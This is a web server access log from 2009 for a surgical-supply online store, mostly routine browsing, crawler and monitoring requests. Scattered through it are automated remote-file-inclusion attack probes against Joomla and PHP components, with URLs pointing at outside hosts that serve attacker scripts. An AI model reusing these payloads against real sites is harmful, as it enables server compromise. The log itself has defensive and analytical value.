66.220.127.215 - - [12/Oct/2009:00:19:04 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
66.220.127.215 - - [12/Oct/2009:00:19:05 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
66.220.127.215 - - [12/Oct/2009:00:19:05 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
66.220.127.215 - - [12/Oct/2009:00:19:05 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
66.220.127.215 - - [12/Oct/2009:00:19:05 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
66.220.127.215 - - [12/Oct/2009:00:19:05 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
66.220.127.215 - - [12/Oct/2009:00:19:05 -0400] "GET /images/items/CONFORM_THUMB.JPG HTTP/1.1" 200 1623 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
66.220.127.215 - - [12/Oct/2009:00:19:05 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
66.220.127.215 - - [12/Oct/2009:00:19:05 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
66.220.127.215 - - [12/Oct/2009:00:19:05 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
66.220.127.215 - - [12/Oct/2009:00:19:05 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
66.220.127.215 - - [12/Oct/2009:00:19:05 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
66.220.127.215 - - [12/Oct/2009:00:19:05 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
66.220.127.215 - - [12/Oct/2009:00:19:05 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
66.220.127.215 - - [12/Oct/2009:00:19:05 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
66.220.127.215 - - [12/Oct/2009:00:19:05 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
66.220.127.215 - - [12/Oct/2009:00:19:05 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
66.220.127.215 - - [12/Oct/2009:00:19:05 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
66.220.127.215 - - [12/Oct/2009:00:19:05 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
211.47.71.89 - - [12/Oct/2009:00:19:21 -0400] "GET /logs/access_log.Q109092000//bbs//skin/ggambo7002_board/write.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
66.220.127.215 - - [12/Oct/2009:00:19:39 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):02" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
123.125.66.84 - - [12/Oct/2009:00:19:40 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
209.59.12.99 - - [12/Oct/2009:00:19:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.234.201.119 - - [12/Oct/2009:00:20:21 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.used-wheelchair.com/z.gif???? HTTP/1.1" 404 230 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
77.234.201.119 - - [12/Oct/2009:00:20:21 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.used-wheelchair.com/z.gif???? HTTP/1.1" 404 225 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
218.234.21.178 - - [12/Oct/2009:00:20:30 -0400] "GET /logs/access_log.Q109072200%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kb27.co.kr/pinkid1.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
67.102.213.107 - - [12/Oct/2009:00:20:46 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
67.102.213.107 - - [12/Oct/2009:00:20:46 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
67.102.213.107 - - [12/Oct/2009:00:20:47 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
67.102.213.107 - - [12/Oct/2009:00:20:47 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
67.102.213.107 - - [12/Oct/2009:00:20:58 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):stethscope HTTP/1.1" 200 38020 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
67.102.213.107 - - [12/Oct/2009:00:21:04 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):stethscope" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
67.102.213.107 - - [12/Oct/2009:00:21:04 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):stethscope" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
67.102.213.107 - - [12/Oct/2009:00:21:05 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):stethscope" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
67.102.213.107 - - [12/Oct/2009:00:21:05 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):stethscope" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
67.102.213.107 - - [12/Oct/2009:00:21:05 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):stethscope" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
67.102.213.107 - - [12/Oct/2009:00:21:05 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):stethscope" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
67.102.213.107 - - [12/Oct/2009:00:21:05 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):stethscope" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
67.102.213.107 - - [12/Oct/2009:00:21:05 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):stethscope" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
67.102.213.107 - - [12/Oct/2009:00:21:06 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):stethscope" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
67.102.213.107 - - [12/Oct/2009:00:21:06 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):stethscope" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
67.102.213.107 - - [12/Oct/2009:00:21:06 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):stethscope" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
67.102.213.107 - - [12/Oct/2009:00:21:06 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):stethscope" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
67.102.213.107 - - [12/Oct/2009:00:21:06 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):stethscope" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
67.102.213.107 - - [12/Oct/2009:00:21:09 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):stethscope" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
67.102.213.107 - - [12/Oct/2009:00:21:10 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):stethscope" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
67.102.213.107 - - [12/Oct/2009:00:21:10 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):stethscope" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
67.102.213.107 - - [12/Oct/2009:00:21:10 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):stethscope" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
67.102.213.107 - - [12/Oct/2009:00:21:10 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):stethscope" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
67.102.213.107 - - [12/Oct/2009:00:21:10 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):stethscope" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
67.102.213.107 - - [12/Oct/2009:00:21:10 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):stethscope" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
67.102.213.107 - - [12/Oct/2009:00:21:10 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):stethscope" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
67.102.213.107 - - [12/Oct/2009:00:21:10 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):stethscope" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
67.102.213.107 - - [12/Oct/2009:00:21:10 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):stethscope" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
67.102.213.107 - - [12/Oct/2009:00:21:10 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):stethscope" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
67.102.213.107 - - [12/Oct/2009:00:21:10 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
67.102.213.107 - - [12/Oct/2009:00:21:13 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
82.193.15.3 - - [12/Oct/2009:00:22:10 -0400] "GET /logs/access_log.Q109061200//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
218.234.21.178 - - [12/Oct/2009:00:22:28 -0400] "GET /logs/access_log.Q109072500///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kb27.co.kr/pinkid1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
218.234.21.178 - - [12/Oct/2009:00:23:44 -0400] "GET /logs/access_log.Q109072500///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kb27.co.kr/pinkid1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Oct/2009:00:24:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.237.203.241 - - [12/Oct/2009:00:24:53 -0400] "GET ///error.php?error=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
203.237.203.241 - - [12/Oct/2009:00:24:53 -0400] "GET /logs///error.php?error=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
203.237.203.241 - - [12/Oct/2009:00:24:53 -0400] "GET /logs/access_log.Q109052200///error.php?error=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.131.38.42 - - [12/Oct/2009:00:25:21 -0400] "GET / HTTP/1.1" 200 409 "-" "-"
209.131.38.42 - - [12/Oct/2009:00:25:21 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "-"
66.249.68.91 - - [12/Oct/2009:00:27:25 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0109C2411F99B9000BD806K+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
201.219.3.163 - - [12/Oct/2009:00:29:04 -0400] "GET /logs/access_log.Q109052200//modules/TotalCalendar/about.php?inc_dir=http://ed1b0tbjs.justfree.com/id3.txt??? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
201.219.3.163 - - [12/Oct/2009:00:29:04 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://ed1b0tbjs.justfree.com/id3.txt??? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
201.219.3.163 - - [12/Oct/2009:00:29:04 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://ed1b0tbjs.justfree.com/id3.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
209.59.12.99 - - [12/Oct/2009:00:29:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
201.219.3.163 - - [12/Oct/2009:00:29:51 -0400] "GET /logs/error_log.Q109052200//modules/TotalCalendar/about.php?inc_dir=http://ed1b0tbjs.justfree.com/id3.txt??? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
93.187.234.69 - - [12/Oct/2009:00:31:45 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://pyungan.or.kr/bbs/.injek/id1.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
93.187.234.69 - - [12/Oct/2009:00:31:45 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://pyungan.or.kr/bbs/.injek/id1.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
93.187.234.69 - - [12/Oct/2009:00:31:45 -0400] "GET /logs/access_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://pyungan.or.kr/bbs/.injek/id1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
93.187.234.69 - - [12/Oct/2009:00:31:45 -0400] "GET /logs/access_log.Q109081300//admin/classes/TplLoad.php?full_path_to_public_program=http://pyungan.or.kr/bbs/.injek/id1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
93.187.234.69 - - [12/Oct/2009:00:33:59 -0400] "GET /logs/access_log.Q109050700%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://pyungan.or.kr/bbs/.injek/id1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
